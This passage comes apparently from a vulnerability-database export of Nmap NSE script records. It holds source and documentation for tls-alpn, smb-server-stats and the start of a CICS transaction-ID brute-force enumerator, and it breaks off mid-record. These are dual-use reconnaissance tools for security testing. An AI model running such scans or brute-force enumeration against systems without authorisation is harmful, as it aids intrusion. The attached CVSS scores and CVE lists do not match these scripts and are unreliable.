see:\n* https://tools.ietf.org/html/rfc7301\n]]\n\n---\n-- @usage\n-- nmap --script=tls-alpn <targets>\n--\n--@output\n-- 443/tcp open https\n-- | tls-alpn:\n-- | h2\n-- | spdy/3\n-- |_ http/1.1\n--\n-- @xmloutput\n-- <elem>h2</elem>\n-- <elem>spdy/3</elem>\n-- <elem>http/1.1</elem>\n\n\nauthor = \"Daniel Miller\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"default\"}\ndependencies = {\"https-redirect\"}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\n\nlocal ALPN_NAME = \"application_layer_protocol_negotiation\"\n\n--- Function that sends a client hello packet with the TLS ALPN extension to the\n-- target host and returns the response\n--@args host The target host table.\n--@args port The target port table.\n--@return status true if response, false else.\n--@return response if status is true.\nlocal client_hello = function(host, port, protos)\n local sock, status, response, err, cli_h\n\n cli_h = tls.client_hello({\n -- TLSv1.3 does not send this extension plaintext.\n -- TODO: implement key exchange crypto to retrieve encrypted extensions\n protocol = \"TLSv1.2\",\n [\"extensions\"] = {\n [ALPN_NAME] = tls.EXTENSION_HELPERS[ALPN_NAME](protos)\n },\n })\n\n -- Connect to the target server\n local status, err\n local sock\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n stdnse.debug1(\"Connection to server failed: %s\", sock)\n return false\n end\n else\n sock = nmap.new_socket()\n status, err = sock:connect(host, port)\n if not status then\n stdnse.debug1(\"Connection to server failed: %s\", err)\n return false\n end\n end\n\n sock:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = sock:send(cli_h)\n if not status then\n stdnse.debug1(\"Couldn't send: %s\", err)\n sock:close()\n return false\n end\n\n -- Read response\n status, response, err = tls.record_buffer(sock)\n if not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n sock:close()\n return false\n end\n\n return true, response\nend\n\n--- Function that checks for the returned protocols to a ALPN extension request.\n--@args response Response to parse.\n--@return results List of found protocols.\nlocal check_alpn = function(response)\n local i, record = tls.record_read(response, 1)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n return nil\n end\n\n if record.type == \"handshake\" and record.body[1].type == \"server_hello\" then\n if record.body[1].extensions == nil then\n stdnse.debug1(\"Server did not return TLS ALPN extension.\")\n return nil\n end\n local results = {}\n local alpndata = record.body[1].extensions[ALPN_NAME]\n if alpndata == nil then\n stdnse.debug1(\"Server did not return TLS ALPN extension.\")\n return nil\n end\n -- Parse data\n alpndata = string.unpack(\">s2\", alpndata, 1)\n i = 1\n while i <= #alpndata do\n if i > 1 then\n stdnse.debug1(\"Server sent multiple protocols but RFC only permits 1\")\n end\n local protocol\n protocol, i = string.unpack(\">s1\", alpndata, i)\n table.insert(results, protocol)\n end\n\n if next(results) then\n return results\n else\n stdnse.debug1(\"Server supports TLS ALPN extension, but no protocols were offered.\")\n return nil\n end\n else\n stdnse.debug1(\"Server response was not server_hello\")\n return nil\n end\nend\n\nlocal function find_and_remove(t, value)\n for i, v in ipairs(t) do\n if v == value then\n table.remove(t, i)\n return true\n end\n end\n return false\nend\n\naction = function(host, port)\n local alpn_protos = {\n -- IANA-registered names\n -- https://www.iana.org/assignments/tls-extensiontype-values/alpn-protocol-ids.csv\n -- Last-Modified: Thu, 31 Oct 2019 22:30:11 GMT\n \"http/0.9\",\n \"http/1.0\",\n \"http/1.1\",\n \"spdy/1\",\n \"spdy/2\",\n \"spdy/3\",\n \"stun.turn\",\n \"stun.nat-discovery\",\n \"h2\",\n \"h2c\", -- should never be negotiated over TLS\n \"webrtc\",\n \"c-webrtc\",\n \"ftp\",\n \"imap\",\n \"pop3\",\n \"managesieve\",\n \"coap\",\n \"xmpp-client\",\n \"xmpp-server\",\n \"acme-tls/1\",\n \"mqtt\",\n -- Other sources\n \"grpc-exp\", -- gRPC, see grpc.io\n }\n\n local chosen = {}\n local unique = {}\n while next(alpn_protos) do\n -- Send crafted client hello\n local status, response = client_hello(host, port, alpn_protos)\n if status and response then\n -- Analyze response\n local result = check_alpn(response)\n if not result then\n stdnse.debug1(\"None of %d protocols chosen\", #alpn_protos)\n goto ALPN_DONE\n end\n for i, p in ipairs(result) do\n if i > 1 then\n stdnse.verbose1(\"Server violates RFC: sent additional protocol %s\", p)\n else\n if not unique[p] then\n chosen[#chosen+1] = p\n end\n unique[p] = true\n if not find_and_remove(alpn_protos, p) then\n stdnse.debug1(\"Chosen ALPN protocol %s was not offered\", p)\n -- Server is forcing this protocol, no need to continue offering.\n goto ALPN_DONE\n end\n end\n end\n else\n stdnse.debug1(\"Client hello failed with %d protocols\", #alpn_protos)\n goto ALPN_DONE\n end\n end\n ::ALPN_DONE::\n if next(chosen) then\n return chosen\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:13", "description": "Attempts to grab the server's statistics over SMB and MSRPC, which uses TCP ports 445 or 139. \n\nAn administrator account is required to pull these statistics on most versions of Windows, and Vista and above require UAC to be turned down. \n\nSome of the numbers returned here don't feel right to me, but they're definitely the numbers that Windows returns. Take the values here with a grain of salt. \n\nThese statistics are found using a single call to a SRVSVC function, `NetServerGetStatistics`. This packet is parsed incorrectly by Wireshark, up to version 1.0.3 (and possibly higher).\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script smb-server-stats.nse -p445 <host>\n sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139 <host>\n \n\n## Script Output \n \n \n Host script results:\n | smb-server-stats:\n | | Server statistics collected since 2009-09-22 09:56:00 (48d5h53m36s):\n | | | 6513655 bytes (1.56 b/s) sent, 40075383 bytes (9.61 b/s) received\n |_ |_ |_ 19323 failed logins, 179 permission errors, 0 system errors, 0 print jobs, 2921 files opened\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "smb-server-stats NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:SMB-SERVER-STATS.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-server-stats.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to grab the server's statistics over SMB and MSRPC, which uses TCP\nports 445 or 139.\n\nAn administrator account is required to pull these statistics on most versions\nof Windows, and Vista and above require UAC to be turned down.\n\nSome of the numbers returned here don't feel right to me, but they're definitely\nthe numbers that Windows returns. Take the values here with a grain of salt.\n\nThese statistics are found using a single call to a SRVSVC function,\n<code>NetServerGetStatistics</code>. This packet is parsed incorrectly by Wireshark,\nup to version 1.0.3 (and possibly higher).\n]]\n\n---\n-- @usage\n-- nmap --script smb-server-stats.nse -p445 <host>\n-- sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139 <host>\n--\n-- @output\n-- Host script results:\n-- | smb-server-stats:\n-- | | Server statistics collected since 2009-09-22 09:56:00 (48d5h53m36s):\n-- | | | 6513655 bytes (1.56 b/s) sent, 40075383 bytes (9.61 b/s) received\n-- |_ |_ |_ 19323 failed logins, 179 permission errors, 0 system errors, 0 print jobs, 2921 files opened\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"intrusive\"}\ndependencies = {\"smb-brute\"}\n\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host)\n\n local result, stats\n local response = {}\n local subresponse = {}\n\n result, stats = msrpc.get_server_stats(host)\n\n if(result == false) then\n return stdnse.format_output(false, response)\n end\n\n table.insert(response, string.format(\"Server statistics collected since %s (%s):\", stats['start_str'], stats['period_str']))\n table.insert(subresponse, string.format(\"%d bytes (%.2f b/s) sent, %d bytes (%.2f b/s) received\", stats['bytessent'], stats['bytessentpersecond'], stats['bytesrcvd'], stats['bytesrcvdpersecond']))\n table.insert(subresponse, string.format(\"%d failed logins, %d permission errors, %d system errors, %d print jobs, %d files opened\", stats['pwerrors'], stats['permerrors'], stats['syserrors'], stats['jobsqueued'], stats['fopens']))\n table.insert(response, subresponse)\n\n return stdnse.format_output(true, response)\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:31", "description": "CICS transaction ID enumerator for IBM mainframes. This script is based on mainframe_brute by Dominic White (<https://github.com/sensepost/mainframe_brute>). However, this script doesn't rely on any third party libraries or tools and instead uses the NSE TN3270 library which emulates a TN3270 screen in lua. \n\nCICS only allows for 4 byte transaction IDs, that is the only specific rule found for CICS transaction IDs.\n\n## Script Arguments \n\n#### cics-enum.commands \n\nCommands in a semi-colon separated list needed to access CICS. Defaults to `CICS`.\n\n#### cics-enum.path \n\nFolder used to store valid transaction id 'screenshots' Defaults to `None` and doesn't store anything.\n\n#### idlist \n\nPath to list of transaction IDs. Defaults to the list of CICS transactions from IBM.\n\n#### cics-enum.pass \n\nPassword to use for authenticated enumeration\n\n#### cics-enum.user \n\nUsername to use for authenticated enumeration\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=cics-enum -p 23 <targets>\n \n nmap --script=cics-enum --script-args=idlist=default_cics.txt,\n cics-enum.command=\"exit;logon applid(cics42)\",\n cics-enum.path=\"/home/dade/screenshots/\",cics-enum.noSSL=true -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 23/tcp open tn3270\n | cics-enum:\n | Accounts:\n | CBAM: Valid - CICS Transaction ID\n | CETR: Valid - CICS Transaction ID\n | CEST: Valid - CICS Transaction ID\n | CMSG: Valid - CICS Transaction ID\n | CEDA: Valid - CICS Transaction ID\n | CEDF: Potentially Valid - CICS Transaction ID\n | DSNC: Valid - CICS Transaction ID\n |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [io](<>)\n * [table](<>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T21:27:09", "type": "nmap", "title": "cics-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:07:55", "id": "NMAP:CICS-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-enum.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal io = require \"io\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\n\n\ndescription = [[\nCICS transaction ID enumerator for IBM mainframes.\nThis script is based o

sniffer-detect NSE Script

Description

Related